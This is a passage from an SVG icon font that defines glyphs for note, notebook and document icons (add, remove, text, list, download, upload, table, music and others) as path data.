<glyph unicode="&#xe993;" glyph-name="note-add2" d="M800 160h-96v32h96v96h32v-96h96v-32h-96v-96h-32v96zM640.698 64h-416.671c-35.361 0-64.028 28.852-64.028 64.028v479.972h736v-239.941c-24.627 10.27-51.651 15.941-80 15.941-114.875 0-208-93.125-208-208 0-41.237 12-79.67 32.698-112v0 0zM160 640v95.972c0 35.361 28.852 64.028 64.028 64.028h607.945c35.361 0 64.028-28.852 64.028-64.028v-95.972h-736zM816 0c97.202 0 176 78.798 176 176s-78.798 176-176 176c-97.202 0-176-78.798-176-176s78.798-176 176-176v0z" />
<glyph unicode="&#xe994;" glyph-name="note-remove" d="M659.191 96h-435.231c-17.651 0-31.96 14.036-31.96 31.96v480.040h672v-262.625c-15.259 4.316-31.36 6.625-48 6.625-97.202 0-176-78.798-176-176 0-28.807 6.921-55.998 19.191-80v0zM896 332.809v403.163c0 35.176-28.666 64.028-64.028 64.028h-607.945c-35.176 0-64.028-28.666-64.028-64.028v-607.945c0-35.176 28.666-64.028 64.028-64.028h456.202c32.281-39.088 81.117-64 135.771-64 97.202 0 176 78.798 176 176 0 68.395-39.013 127.678-96 156.809v0zM192 640v96.040c0 17.651 14.036 31.96 31.96 31.96h608.080c17.651 0 31.96-14.036 31.96-31.96v-96.040h-672zM816 32v0 0c-79.529 0-144 64.471-144 144s64.471 144 144 144c79.529 0 144-64.471 144-144s-64.471-144-144-144zM704 192v-32h224v32h-224z" />
<glyph unicode="&#xe995;" glyph-name="note-remove2" d="M640.698 64h-416.671c-35.361 0-64.028 28.852-64.028 64.028v479.972h736v-239.941c-24.627 10.27-51.651 15.941-80 15.941-114.875 0-208-93.125-208-208 0-41.237 12-79.67 32.698-112v0 0zM160 640v95.972c0 35.361 28.852 64.028 64.028 64.028h607.945c35.361 0 64.028-28.852 64.028-64.028v-95.972h-736zM816 0v0c-97.202 0-176 78.798-176 176s78.798 176 176 176c97.202 0 176-78.798 176-176s-78.798-176-176-176zM704 192v-32h224v32h-224z" />
<glyph unicode="&#xe996;" glyph-name="note-text" d="M192 608v-480.040c0-17.924 14.434-31.96 32.239-31.96h447.761v159.811c0 35.82 28.624 64.189 63.933 64.189h128.067v288h-672zM192 640h672v95.781c0 17.821-14.309 32.219-31.96 32.219h-608.080c-17.924 0-31.96-14.309-31.96-31.96v-96.040zM688 64h-463.997c-35.348 0-64.003 28.852-64.003 64.028v607.945c0 35.361 28.852 64.028 64.028 64.028h607.945c35.361 0 64.028-28.624 64.028-63.81v-448.19l-192-224h-16zM704 112l150.398 176h-118.503c-17.475 0-31.896-14.453-31.896-32.281v-143.719zM256 512v-32h544v32h-544zM256 416v-32h544v32h-544zM256 320v-32h352v32h-352zM256 224v-32h352v32h-352z" />
<glyph unicode="&#xe997;" glyph-name="note-text2" d="M160 608h736v-288h-159.811c-35.451 0-64.189-28.375-64.189-63.939v-192.061h-448.19c-35.241 0-63.81 28.852-63.81 64.028v479.972zM160 640v95.972c0 35.361 28.852 64.028 64.028 64.028h607.945c35.361 0 64.028-28.589 64.028-63.74v-96.26h-736zM704 64v191.906c0 17.725 14.431 32.094 31.705 32.094h160.295l-192-224zM256 512v-32h544v32h-544zM256 416v-32h544v32h-544zM256 320v-32h352v32h-352zM256 224v-32h352v32h-352z" />
<glyph unicode="&#xe998;" glyph-name="note-list" d="M688 64h-463.997c-35.348 0-64.003 28.852-64.003 64.028v607.945c0 35.361 28.852 64.028 64.028 64.028h607.945c35.361 0 64.028-28.624 64.028-63.81v-448.19l-192-224h-16zM192 608v-480.040c0-17.924 14.434-31.96 32.239-31.96h447.761v159.811c0 35.82 28.624 64.189 63.933 64.189h128.067v288h-672zM192 640h672v95.781c0 17.821-14.309 32.219-31.96 32.219h-608.080c-17.924 0-31.96-14.309-31.96-31.96v-96.040zM704 112l150.398 176h-118.503c-17.475 0-31.896-14.453-31.896-32.281v-143.719zM416 384v-32h224v32h-224zM256 416h96v-96h-96v96zM288 384v-32h32v32h-32zM416 512v-32h384v32h-384zM256 544h96v-96h-96v96zM288 512v-32h32v32h-32zM416 256v-32h192v32h-192zM256 288h96v-96h-96v96zM288 256v-32h32v32h-32z" />
<glyph unicode="&#xe999;" glyph-name="note-list2" d="M160 608h736v-288h-159.811c-35.451 0-64.189-28.375-64.189-63.939v-192.061h-448.19c-35.241 0-63.81 28.852-63.81 64.028v479.972zM160 640v95.972c0 35.361 28.852 64.028 64.028 64.028h607.945c35.361 0 64.028-28.589 64.028-63.74v-96.26h-736zM704 64v191.906c0 17.725 14.431 32.094 31.705 32.094h160.295l-192-224zM416 384v-32h224v32h-224zM256 416v-96h96v96h-96zM288 384v-32h32v32h-32zM416 512v-32h384v32h-384zM256 544v-96h96v96h-96zM288 512v-32h32v32h-32zM416 256v-32h192v32h-192zM256 288v-96h96v96h-96zM288 256v-32h32v32h-32z" />
<glyph unicode="&#xe99a;" glyph-name="note-checked" d="M192 608v-480.040c0-17.924 14.434-31.96 32.239-31.96h447.761v159.811c0 35.82 28.624 64.189 63.933 64.189h128.067v288h-672zM192 640h672v95.781c0 17.821-14.309 32.219-31.96 32.219h-608.080c-17.924 0-31.96-14.309-31.96-31.96v-96.040zM688 64h-463.997c-35.348 0-64.003 28.852-64.003 64.028v607.945c0 35.361 28.852 64.028 64.028 64.028h607.945c35.361 0 64.028-28.624 64.028-63.81v-448.19l-192-224h-16zM704 112l150.398 176h-118.503c-17.475 0-31.896-14.453-31.896-32.281v-143.719zM459.314 237.271l248.902 248.902-22.627 22.627-226.274-226.274-119.765 119.765-22.627-22.627 142.392-142.392z" />
<glyph unicode="&#xe99b;" glyph-name="note-checked2" d="M160 608h736v-288h-159.811c-35.451 0-64.189-28.375-64.189-63.939v-192.061h-448.19c-35.241 0-63.81 28.852-63.81 64.028v479.972zM160 640v95.972c0 35.361 28.852 64.028 64.028 64.028h607.945c35.361 0 64.028-28.589 64.028-63.74v-96.26h-736zM704 64v191.906c0 17.725 14.431 32.094 31.705 32.094h160.295l-192-224zM459.314 237.271l248.902 248.902-22.627 22.627-226.274-226.274-119.765 119.765-22.627-22.627 142.392-142.392z" />
<glyph unicode="&#xe99c;" glyph-name="note-important" d="M192 608v-480.040c0-17.924 14.434-31.96 32.239-31.96h447.761v159.811c0 35.82 28.624 64.189 63.933 64.189h128.067v288h-672zM192 640h672v95.781c0 17.821-14.309 32.219-31.96 32.219h-608.080c-17.924 0-31.96-14.309-31.96-31.96v-96.040zM688 64h-463.997c-35.348 0-64.003 28.852-64.003 64.028v607.945c0 35.361 28.852 64.028 64.028 64.028h607.945c35.361 0 64.028-28.624 64.028-63.81v-448.19l-192-224h-16zM704 112l150.398 176h-118.503c-17.475 0-31.896-14.453-31.896-32.281v-143.719zM480 544h96v-256h-96v256zM512 512v-192h32v192h-32zM480 256h96v-96h-96v96zM512 224v-32h32v32h-32z" />
<glyph unicode="&#xe99d;" glyph-name="note-important2" d="M160 608h736v-288h-159.811c-35.451 0-64.189-28.375-64.189-63.939v-192.061h-448.19c-35.241 0-63.81 28.852-63.81 64.028v479.972zM160 640v95.972c0 35.361 28.852 64.028 64.028 64.028h607.945c35.361 0 64.028-28.589 64.028-63.74v-96.26h-736zM704 64v191.906c0 17.725 14.431 32.094 31.705 32.094h160.295l-192-224zM512 512v-192h32v192h-32zM512 224v-32h32v32h-32z" />
<glyph unicode="&#xe99e;" glyph-name="notebook2" d="M224 352h-32v32h32v96h-32v32h32v96h-32v32h32v96h-32v32h32v31.765c0 35.488 28.617 64.235 63.918 64.235h480.165c35.408 0 63.918-28.759 63.918-64.235v-735.531c0-35.488-28.617-64.235-63.918-64.235h-480.165c-35.408 0-63.918 28.759-63.918 64.235v31.765h-32v32h32v96h-32v32h32v96zM256 352v-96h32v-32h-32v-96h32v-32h-32v-32.145c0-17.593 14.551-31.855 31.999-31.855h480.003c17.672 0 31.999 14.568 31.999 31.855v736.291c0 17.593-14.551 31.855-31.999 31.855h-480.003c-17.672 0-31.999-14.568-31.999-31.855v-32.145h32v-32h-32v-96h32v-32h-32v-96h32v-32h-32v-96h32v-32h-32zM352 704v-32h352v32h-352zM384 576v-32h288v32h-288z" />
<glyph unicode="&#xe99f;" glyph-name="notebook3" d="M160 384h64v-32h-64v32zM160 512h64v-32h-64v32zM160 256h64v-32h-64v32zM160 128h64v-32h-64v32zM160 640h64v-32h-64v32zM160 768h64v-32h-64v32zM768.1 864h-480.2c-35.3 0-63.9-28.7-63.9-64.2v-31.8h64v-32h-64v-96h64v-32h-64v-96h64v-32h-64v-96h64v-32h-64v-96h64v-32h-64v-96h64v-32h-64v-31.8c0-35.5 28.5-64.2 63.9-64.2h480.2c35.3 0 63.9 28.7 63.9 64.2v735.6c0 35.4-28.5 64.2-63.9 64.2zM672 544h-288v32h288v-32zM704 672h-352v32h352v-32z" />
<glyph unicode="&#xe9a0;" glyph-name="notebook4" d="M224 352h-32v32h32v96h-32v32h32v96h-32v32h32v96h-32v32h32v31.765c0 35.488 28.617 64.235 63.918 64.235h480.165c35.408 0 63.918-28.759 63.918-64.235v-735.531c0-35.488-28.617-64.235-63.918-64.235h-480.165c-35.408 0-63.918 28.759-63.918 64.235v31.765h-32v32h32v96h-32v32h32v96zM256 352v-96h32v-32h-32v-96h32v-32h-32v-32.145c0-17.593 14.551-31.855 31.999-31.855h480.003c17.672 0 31.999 14.568 31.999 31.855v736.291c0 17.593-14.551 31.855-31.999 31.855h-480.003c-17.672 0-31.999-14.568-31.999-31.855v-32.145h32v-32h-32v-96h32v-32h-32v-96h32v-32h-32v-96h32v-32h-32zM384 704h288v-160h-288v160zM416 672v-96h224v96h-224z" />
<glyph unicode="&#xe9a1;" glyph-name="notebook5" d="M160 384h64v-32h-64v32zM160 128h64v-32h-64v32zM160 256h64v-32h-64v32zM160 512h64v-32h-64v32zM160 640h64v-32h-64v32zM160 768h64v-32h-64v32zM416 672h224v-96h-224v96zM768.1 864h-480.2c-35.3 0-63.9-28.7-63.9-64.2v-31.8h64v-32h-64v-96h64v-32h-64v-96h64v-32h-64v-96h64v-32h-64v-96h64v-32h-64v-96h64v-32h-64v-31.8c0-35.5 28.5-64.2 63.9-64.2h480.2c35.3 0 63.9 28.7 63.9 64.2v735.6c0 35.4-28.5 64.2-63.9 64.2zM672 544h-288v160h288v-160z" />
<glyph unicode="&#xe9a2;" glyph-name="notebook6" d="M704 832h64.001c17.448 0 31.999-14.262 31.999-31.855v-736.291c0-17.286-14.326-31.855-31.999-31.855h-480.003c-17.448 0-31.999 14.262-31.999 31.855v32.145h32v32h-32v96h32v32h-32v96h32v32h-32v96h32v32h-32v96h32v32h-32v96h32v32h-32v32.145c0 17.286 14.326 31.855 31.999 31.855h224.001v-384l96 96 96-96v384zM224 352v-96h-32v-32h32v-96h-32v-32h32v-31.765c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.747 63.918 64.235v735.531c0 35.476-28.51 64.235-63.918 64.235h-480.165c-35.301 0-63.918-28.747-63.918-64.235v-31.765h-32v-32h32v-96h-32v-32h32v-96h-32v-32h32v-96h-32v-32h32zM544 832h128v-307.199l-64 64-64-64v307.199z" />
<glyph unicode="&#xe9a3;" glyph-name="notebook7" d="M704 864h64.082c35.408 0 63.918-28.759 63.918-64.235v-735.531c0-35.488-28.617-64.235-63.918-64.235h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.617 64.235 63.918 64.235h224.082v-416l96 96 96-96v416zM160 640v-32h64v32h-64zM160 512v-32h64v32h-64zM160 768v-32h64v32h-64zM160 256v-32h64v32h-64zM160 128v-32h64v32h-64zM160 384v-32h64v32h-64zM224 640v-32h64v32h-64zM224 512v-32h64v32h-64zM224 768v-32h64v32h-64zM224 256v-32h64v32h-64zM224 128v-32h64v32h-64zM224 384v-32h64v32h-64zM544 864v-339.199l64 64 64-64v339.199h-128z" />
<glyph unicode="&#xe9a4;" glyph-name="notebook8" d="M672 832v32h32v-32h32.082c35.408 0 63.918-28.705 63.918-64.115v-671.77c0-35.643-28.617-64.115-63.918-64.115h-480.165c-35.408 0-63.918 28.705-63.918 64.115v671.77c0 35.643 28.617 64.115 63.918 64.115h32.082v32h32v-32h96v32h32v-32h96v32h32v-32h96zM672 800h-96v-32h-32v32h-96v-32h-32v32h-96v-32h-32v32h-32.001c-17.672 0-31.999-14.045-31.999-32.098v-671.803c0-17.727 14.551-32.098 31.999-32.098h480.003c17.672 0 31.999 14.045 31.999 32.098v671.803c0 17.727-14.551 32.098-31.999 32.098h-32.001v-32h-32v32z" />
<glyph unicode="&#xe9a5;" glyph-name="notebook9" d="M416 896h32v-64h-32v64zM544 896h32v-64h-32v64zM672 896h32v-64h-32v64zM288 896h32v-64h-32v64zM736.1 832c0 0-28.1 0-32.1 0v-64h-32v64h-96v-64h-32v64h-96v-64h-32v64h-96v-64h-32v64c-4 0-32.1 0-32.1 0-35.3 0-63.9-28.5-63.9-64.1v-671.8c0-35.4 28.5-64.1 63.9-64.1h480.2c35.3 0 63.9 28.5 63.9 64.1v671.8c0 35.4-28.5 64.1-63.9 64.1z" />
<glyph unicode="&#xe9a6;" glyph-name="notebook-text" d="M672 832v32h32v-32h32.082c35.408 0 63.918-28.705 63.918-64.115v-671.77c0-35.643-28.617-64.115-63.918-64.115h-480.165c-35.408 0-63.918 28.705-63.918 64.115v671.77c0 35.643 28.617 64.115 63.918 64.115h32.082v32h32v-32h96v32h32v-32h96v32h32v-32h96zM672 800h-96v-32h-32v32h-96v-32h-32v32h-96v-32h-32v32h-32.001c-17.672 0-31.999-14.045-31.999-32.098v-671.803c0-17.727 14.551-32.098 31.999-32.098h480.003c17.672 0 31.999 14.045 31.999 32.098v671.803c0 17.727-14.551 32.098-31.999 32.098h-32.001v-32h-32v32zM288 672v-32h416v32h-416zM288 576v-32h416v32h-416zM288 480v-32h416v32h-416zM288 384v-32h416v32h-416zM288 288v-32h416v32h-416zM288 192v-32h416v32h-416z" />
<glyph unicode="&#xe9a7;" glyph-name="notebook-text2" d="M736.1 832c0 0-28.1 0-32.1 0v-64h-32v64h-96v-64h-32v64h-96v-64h-32v64h-96v-64h-32v64c-4 0-32.1 0-32.1 0-35.3 0-63.9-28.5-63.9-64.1v-671.8c0-35.4 28.5-64.1 63.9-64.1h480.2c35.3 0 63.9 28.5 63.9 64.1v671.8c0 35.4-28.5 64.1-63.9 64.1zM704 160h-416v32h416v-32zM704 256h-416v32h416v-32zM704 352h-416v32h416v-32zM704 448h-416v32h416v-32zM704 544h-416v32h416v-32zM704 640h-416v32h416v-32zM288 896h32v-64h-32v64zM416 896h32v-64h-32v64zM544 896h32v-64h-32v64zM672 896h32v-64h-32v64z" />
<glyph unicode="&#xe9a8;" glyph-name="notebook-list" d="M672 832v32h32v-32h32.082c35.408 0 63.918-28.705 63.918-64.115v-671.77c0-35.643-28.617-64.115-63.918-64.115h-480.165c-35.408 0-63.918 28.705-63.918 64.115v671.77c0 35.643 28.617 64.115 63.918 64.115h32.082v32h32v-32h96v32h32v-32h96v32h32v-32h96zM672 800h-96v-32h-32v32h-96v-32h-32v32h-96v-32h-32v32h-32.001c-17.672 0-31.999-14.045-31.999-32.098v-671.803c0-17.727 14.551-32.098 31.999-32.098h480.003c17.672 0 31.999 14.045 31.999 32.098v671.803c0 17.727-14.551 32.098-31.999 32.098h-32.001v-32h-32v32zM448 576v-32h256v32h-256zM288 608h96v-96h-96v96zM320 576v-32h32v32h-32zM288 448h96v-96h-96v96zM320 416v-32h32v32h-32zM448 416v-32h256v32h-256zM288 288h96v-96h-96v96zM320 256v-32h32v32h-32zM448 256v-32h256v32h-256z" />
<glyph unicode="&#xe9a9;" glyph-name="notebook-list2" d="M288 896h32v-64h-32v64zM416 896h32v-64h-32v64zM544 896h32v-64h-32v64zM672 896h32v-64h-32v64zM320 256h32v-32h-32v32zM320 416h32v-32h-32v32zM320 576h32v-32h-32v32zM736.1 832c0 0-28.1 0-32.1 0v-64h-32v64h-96v-64h-32v64h-96v-64h-32v64h-96v-64h-32v64c-4 0-32.1 0-32.1 0-35.3 0-63.9-28.5-63.9-64.1v-671.8c0-35.4 28.5-64.1 63.9-64.1h480.2c35.3 0 63.9 28.5 63.9 64.1v671.8c0 35.4-28.5 64.1-63.9 64.1zM384 192h-96v96h96v-96zM384 352h-96v96h96v-96zM384 512h-96v96h96v-96zM704 224h-256v32h256v-32zM704 384h-256v32h256v-32zM704 544h-256v32h256v-32z" />
<glyph unicode="&#xe9aa;" glyph-name="document2" d="M624 864h16l192-224v-576.295c0-34.963-28.617-63.705-63.918-63.705h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.693 64.235 64.088 64.235h335.912zM608 832h-320.142c-17.595 0-31.858-14.568-31.858-31.855v-736.291c0-17.593 14.551-31.855 31.999-31.855h480.003c17.672 0 31.999 14.238 31.999 31.789v544.211h-128.067c-35.309 0-63.933 28.37-63.933 64.189v159.811zM640 816v-143.719c0-17.828 14.421-32.281 31.896-32.281h118.503l-150.398 176z" />
<glyph unicode="&#xe9ab;" glyph-name="document3" d="M608 864h-319.727c-35.497 0-64.273-28.747-64.273-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.51 63.918 63.918v544.082h-159.811c-35.451 0-64.189 28.375-64.189 63.939v192.061zM640 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224z" />
<glyph unicode="&#xe9ac;" glyph-name="document-text" d="M624 864h16l192-224v-576.295c0-34.963-28.617-63.705-63.918-63.705h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.693 64.235 64.088 64.235h335.912zM608 832h-320.142c-17.595 0-31.858-14.568-31.858-31.855v-736.291c0-17.593 14.551-31.855 31.999-31.855h480.003c17.672 0 31.999 14.238 31.999 31.789v544.211h-128.067c-35.309 0-63.933 28.37-63.933 64.189v159.811zM640 816v-143.719c0-17.828 14.421-32.281 31.896-32.281h118.503l-150.398 176zM320 640v-32h224v32h-224zM320 736v-32h224v32h-224zM320 544v-32h416v32h-416zM320 448v-32h416v32h-416zM320 352v-32h416v32h-416zM320 256v-32h416v32h-416zM320 160v-32h416v32h-416z" />
<glyph unicode="&#xe9ad;" glyph-name="document-text2" d="M608 864v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-544.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727zM640 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM320 640v-32h224v32h-224zM320 736v-32h224v32h-224zM320 544v-32h416v32h-416zM320 448v-32h416v32h-416zM320 352v-32h416v32h-416zM320 256v-32h416v32h-416zM320 160v-32h416v32h-416z" />
<glyph unicode="&#xe9ae;" glyph-name="document-text3" d="M624 864h16l192-224v-576.295c0-34.963-28.617-63.705-63.918-63.705h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.693 64.235 64.088 64.235h335.912zM608 832h-320.142c-17.595 0-31.858-14.568-31.858-31.855v-736.291c0-17.593 14.551-31.855 31.999-31.855h480.003c17.672 0 31.999 14.238 31.999 31.789v544.211h-128.067c-35.309 0-63.933 28.37-63.933 64.189v159.811zM640 816v-143.719c0-17.828 14.421-32.281 31.896-32.281h118.503l-150.398 176zM320 640v-32h160v32h-160zM320 736v-32h224v32h-224zM320 544v-32h416v32h-416zM320 448v-32h320v32h-320zM320 352v-32h416v32h-416zM320 256v-32h288v32h-288zM320 160v-32h416v32h-416z" />
<glyph unicode="&#xe9af;" glyph-name="document-text4" d="M608 864v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-544.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727zM320 640v-32h160v32h-160zM320 736v-32h224v32h-224zM320 544v-32h416v32h-416zM320 448v-32h320v32h-320zM320 352v-32h416v32h-416zM320 256v-32h288v32h-288zM320 160v-32h416v32h-416zM640 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224z" />
<glyph unicode="&#xe9b0;" glyph-name="document-download" d="M512 158.4l-104 104-24-24 144-144 144 144-24 24-104-104v353.6h-32v-353.6zM624 864h16l192-224v-576.295c0-34.963-28.617-63.705-63.918-63.705h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.693 64.235 64.088 64.235h335.912zM608 832h-320.142c-17.595 0-31.858-14.568-31.858-31.855v-736.291c0-17.593 14.551-31.855 31.999-31.855h480.003c17.672 0 31.999 14.238 31.999 31.789v544.211h-128.067c-35.309 0-63.933 28.37-63.933 64.189v159.811zM640 816v-143.719c0-17.828 14.421-32.281 31.896-32.281h118.503l-150.398 176z" />
<glyph unicode="&#xe9b1;" glyph-name="document-download2" d="M512 158.4v353.6h32v-353.6l104 104 24-24-144-144-144 144 24 24 104-104zM608 864h-319.727c-35.497 0-64.273-28.747-64.273-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.51 63.918 63.918v544.082h-159.811c-35.451 0-64.189 28.375-64.189 63.939v192.061zM640 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224z" />
<glyph unicode="&#xe9b2;" glyph-name="document-upload" d="M512 32h-224.001c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-544.211c0-17.55-14.326-31.789-31.999-31.789h-224.001v320l104-104 24 24-144 144-144-144 24-24 104 104v-320zM624 864h-335.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v576.295l-192 224h-16zM640 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719z" />
<glyph unicode="&#xe9b3;" glyph-name="document-upload2" d="M512 0h-224.082c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-544.082c0-35.408-28.617-63.918-63.918-63.918h-224.082v352l104-104 24 24-144 144-144-144 24-24 104 104v-352zM640 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224z" />
<glyph unicode="&#xe9b4;" glyph-name="document-bookmark" d="M512 832h96v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-544.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h32.142v-352l96 96 96-96v352zM624 864h-335.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v576.295l-192 224h-16zM640 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM352 832h128v-275.199l-64 64-64-64v275.199z" />
<glyph unicode="&#xe9b5;" glyph-name="document-bookmark2" d="M512 864h96v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-544.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h31.727v-384l96 96 96-96v384zM352 864v-307.199l64 64 64-64v307.199h-128zM640 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224z" />
<glyph unicode="&#xe9b6;" glyph-name="document-diagrams" d="M608 384v96h-160v-160h-128v-192h416v256h-128zM624 864h16l192-224v-576.295c0-34.963-28.617-63.705-63.918-63.705h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.693 64.235 64.088 64.235h335.912zM608 832h-320.142c-17.595 0-31.858-14.568-31.858-31.855v-736.291c0-17.593 14.551-31.855 31.999-31.855h480.003c17.672 0 31.999 14.238 31.999 31.789v544.211h-128.067c-35.309 0-63.933 28.37-63.933 64.189v159.811zM640 816v-143.719c0-17.828 14.421-32.281 31.896-32.281h118.503l-150.398 176zM352 288h96v-128h-96v128zM480 448h96v-288h-96v288zM608 352h96v-192h-96v192z" />
<glyph unicode="&#xe9b7;" glyph-name="document-diagrams2" d="M608 864v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-544.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727zM640 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM352 288v-128h96v128h-96zM480 448v-288h96v288h-96zM608 352v-192h96v192h-96z" />
<glyph unicode="&#xe9b8;" glyph-name="document-recording" d="M624 864h16l192-224v-576.295c0-34.963-28.617-63.705-63.918-63.705h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.693 64.235 64.088 64.235h335.912zM608 832h-320.142c-17.595 0-31.858-14.568-31.858-31.855v-736.291c0-17.593 14.551-31.855 31.999-31.855h480.003c17.672 0 31.999 14.238 31.999 31.789v544.211h-128.067c-35.309 0-63.933 28.37-63.933 64.189v159.811zM640 816v-143.719c0-17.828 14.421-32.281 31.896-32.281h118.503l-150.398 176zM416 304.173v47.827h32v-47.764c0-44.313 35.509-80.236 80-80.236 44.183 0 80 35.989 80 80.236v47.764h32v-47.827c0-56.562-41.723-103.27-96-111.038v-65.135h64v-32h-160v32h64v65.14c-54.186 7.788-96 54.532-96 111.033v0zM480 431.946v0c0 26.576 21.49 48.054 48 48.054 26.694 0 48-21.514 48-48.054v-127.893c0-26.576-21.49-48.054-48-48.054-26.694 0-48 21.514-48 48.054v127.893zM528 448c-8.837 0-16-6.875-16-15.926v-128.147c0-8.796 7.422-15.926 16-15.926 8.837 0 16 6.875 16 15.926v128.147c0 8.796-7.422 15.926-16 15.926v0z" />
<glyph unicode="&#xe9b9;" glyph-name="document-recording2" d="M608 864h-319.727c-35.497 0-64.273-28.747-64.273-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.51 63.918 63.918v544.082h-159.811c-35.451 0-64.189 28.375-64.189 63.939v192.061zM416 304.173v47.827h32v-47.764c0-44.313 35.509-80.236 80-80.236 44.183 0 80 35.989 80 80.236v47.764h32v-47.827c0-56.562-41.723-103.27-96-111.038v-65.135h64v-32h-160v32h64v65.14c-54.186 7.788-96 54.532-96 111.033v0zM640 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM480 431.946v0c0 26.576 21.49 48.054 48 48.054 26.694 0 48-21.514 48-48.054v-127.893c0-26.576-21.49-48.054-48-48.054-26.694 0-48 21.514-48 48.054v127.893zM528 448c-8.837 0-16-6.875-16-15.926v-128.147c0-8.796 7.422-15.926 16-15.926 8.837 0 16 6.875 16 15.926v128.147c0 8.796-7.422 15.926-16 15.926v0z" />
<glyph unicode="&#xe9ba;" glyph-name="document-table" d="M512 288v-64h-128v64h128zM544 288h128v-64h-128v64zM512 128h-128v64h128v-64zM544 128v64h128v-64h-128zM512 384v-64h-128v64h128zM544 384h128v-64h-128v64zM512 480v-64h-128v64h128zM544 480h128v-64h-128v64zM624 864h16l192-224v-576.295c0-34.963-28.617-63.705-63.918-63.705h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.693 64.235 64.088 64.235h335.912zM608 832h-320.142c-17.595 0-31.858-14.568-31.858-31.855v-736.291c0-17.593 14.551-31.855 31.999-31.855h480.003c17.672 0 31.999 14.238 31.999 31.789v544.211h-128.067c-35.309 0-63.933 28.37-63.933 64.189v159.811zM640 816v-143.719c0-17.828 14.421-32.281 31.896-32.281h118.503l-150.398 176zM352 544v-448h352v448h-352z" />
<glyph unicode="&#xe9bb;" glyph-name="document-table2" d="M512 288h-128v-64h128v64zM544 288h128v-64h-128v64zM512 128h-128v64h128v-64zM544 128h128v64h-128v-64zM512 384h-128v-64h128v64zM544 384h128v-64h-128v64zM512 480h-128v-64h128v64zM544 480h128v-64h-128v64zM608 864v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-544.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727zM640 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM352 544v-448h352v448h-352z" />
<glyph unicode="&#xe9bc;" glyph-name="document-music" d="M704 472.889v-200.883c-13.371 10.043-29.99 15.994-48 15.994-44.183 0-80-35.817-80-80s35.817-80 80-80c44.183 0 80 35.817 80 80v304l-288-64v-207.994c-13.371 10.043-29.99 15.994-48 15.994-44.183 0-80-35.817-80-80s35.817-80 80-80c44.183 0 80 35.817 80 80v247.111l224 49.778zM624 864h16l192-224v-576.295c0-34.963-28.617-63.705-63.918-63.705h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.693 64.235 64.088 64.235h335.912zM608 832h-320.142c-17.595 0-31.858-14.568-31.858-31.855v-736.291c0-17.593 14.551-31.855 31.999-31.855h480.003c17.672 0 31.999 14.238 31.999 31.789v544.211h-128.067c-35.309 0-63.933 28.37-63.933 64.189v159.811zM640 816v-143.719c0-17.828 14.421-32.281 31.896-32.281h118.503l-150.398 176zM400 128v0c-26.51 0-48 21.49-48 48s21.49 48 48 48c26.51 0 48-21.49 48-48s-21.49-48-48-48zM656 160v0c-26.51 0-48 21.49-48 48s21.49 48 48 48c26.51 0 48-21.49 48-48s-21.49-48-48-48z" />
